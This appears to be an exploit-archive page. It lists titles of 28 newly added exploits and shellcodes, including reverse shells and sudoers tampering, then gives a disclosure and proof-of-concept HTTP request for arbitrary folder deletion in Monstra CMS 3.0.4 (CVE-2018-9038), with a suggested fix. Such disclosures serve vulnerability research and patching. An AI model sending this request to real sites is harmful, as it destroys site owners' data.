c249d94cb7
28 changes to exploits/shellcodes gif2apng 1.9 - '.gif' Stack Buffer Overflow VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 - Memory Corruption (PoC) Kaspersky KSN for Linux 5.2 - Memory Corruption Microsoft (Win 10) Internet Explorer 11.371.16299.0 - Denial Of Service Adobe Flash - Overflow when Playing Sound Adobe Flash - Overflow in Slab Rendering Adobe Flash - Info Leak in Image Inflation Adobe Flash - Out-of-Bounds Write in blur Filtering Chrome V8 JIT - 'NodeProperties::InferReceiverMaps' Type Confusion R 3.4.4 - Local Buffer Overflow Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH) lastore-daemon D-Bus - Privilege Escalation (Metasploit) Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) ASUS infosvr - Auth Bypass Command Execution (Metasploit) UK Cookie Consent - Persistent Cross-Site Scripting WUZHI CMS 4.1.0 - Cross-Site Request Forgery Open-AudIT 2.1 - CSV Macro Injection Monstra CMS 3.0.4 - Arbitrary Folder Deletion Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure WordPress Plugin Woo Import Export 1.0 - Arbitrary File Deletion WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting Linux/x86 - Bind TCP (1337/TCP) Shell + Null-Free Shellcode (92 bytes) Linux/x86 - Edit /etc/sudoers with NOPASSWD for ALL Shellcode Linux/x86 - Reverse TCP (5555/TCP) Shellcode - (73 Bytes) Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes) Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode Encoded with ROT-13 + RShift-2 + XOR Encoded (44 bytes)
44 lines
No EOL
1.6 KiB
Text
44 lines
No EOL
1.6 KiB
Text
# Exploit Title: Monstra CMS 3.0.4 allows remote attackers to delete folder via an get request
|
|
# Date: 2018-03-26
|
|
# Exploit Author: Wenming Jiang
|
|
# Vendor Homepage: https://github.com/monstra-cms/monstra
|
|
# Software Link: https://github.com/monstra-cms/monstra
|
|
# Version: 3.0.4
|
|
# Tested on: macos 10.12.6, php 5.6, apache2.2.29
|
|
# CVE :CVE-2018-9038
|
|
|
|
|
|
Description:
|
|
Monstra CMS 3.0.4 allows remote attackers to delete folder via an admin/index.php?id=filesmanager&delete_dir=./&path=uploads/ request.
|
|
|
|
|
|
Steps to Reproduce:
|
|
1、Log in as a user with page editing permissions
|
|
2、Request http://your_site/admin/index.php?id=filesmanager&delete_dir=./&path=uploads
|
|
3、The uploads folder will be deleted.
|
|
|
|
|
|
Poc code:
|
|
GET /monstra/admin/index.php?id=filesmanager&delete_dir=./&path=uploads/&token=008708df48237172f6fe2d173dc30529eac132de HTTP/1.1
|
|
Host: localhost:8000
|
|
Upgrade-Insecure-Requests: 1
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.10 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
|
Referer: http://localhost:8000/monstra/admin/index.php?id=filesmanager&path=uploads/
|
|
Accept-Language: zh,zh-CN;q=0.9,en;q=0.8,zh-TW;q=0.7
|
|
Cookie: SQLiteManager_currentLangue=2; PHPSESSID=882dd1e203c979cedba4524f8107eca3; _ga=GA1.1.1742657188.1524382699; _gid=GA1.1.918663288.1524382699
|
|
Connection: close
|
|
|
|
|
|
|
|
Vulnerability Type:
|
|
Insecure Permissions
|
|
|
|
|
|
Expected Behavior:
|
|
deleted uploads folder
|
|
|
|
|
|
|
|
Possible Solutions:
|
|
Strictly filter the delete_dir parameter and replace './' with '_/' |